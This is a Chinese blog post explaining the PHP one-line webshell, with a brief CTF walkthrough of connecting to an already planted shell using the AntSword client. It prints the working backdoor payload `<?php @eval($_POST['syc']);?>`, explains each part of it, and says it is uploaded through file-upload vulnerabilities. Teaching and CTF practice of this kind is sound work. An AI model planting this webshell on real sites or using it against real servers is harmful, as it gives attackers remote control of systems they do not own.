赞
踩
目录
先来说说一句话木马是什么东西
一句话木马,又简称(webshell),在很多渗透测试时,渗透人员会上传一句话木马到目前web服务目录继而提权获取系统权限。
<?php @eval($_POST['syc']);?>
它的原理呢,是利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以通过中国菜刀即可获取和控制整个网站目录。
@表示后面即使执行错误,也不报错。
eval()函数表示括号内的语句字符串什么的全都当做代码执行。
$_POST['syc']表示从页面中获得syc这个参数值
(1)木马上传成功
(2)知道木马的路径
(3)木马能够正常运行
如果想要更加详细深入的了解的话,可以看一看这篇文章
https://blog.csdn.net/weixin_39190897/article/details/86772765
蚁剑和菜刀就是使用一句话木马的
这一篇博客里有具体的内容,我就不重复造车了
https://www.fujieace.com/hacker/tools/antsword.html
我捣鼓了一堆,估计得有几个蚁剑,没关系,能够运行就行!
来一道相关的题,更加深刻的理解一句话木马
都说这么明显了,,,,,直接上吧
由于我菜刀老是用不起,,而且蚁剑的功能更好,那我们就用蚁剑
直接添加,然后输入网站url,密码即为Syc,然后就登录成功了,可以看见目录,往下翻到flag,找到了!
这道题的一句话木马已经上传好了,具体的内容,之后遇见在详细解释吧!
赞
踩
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。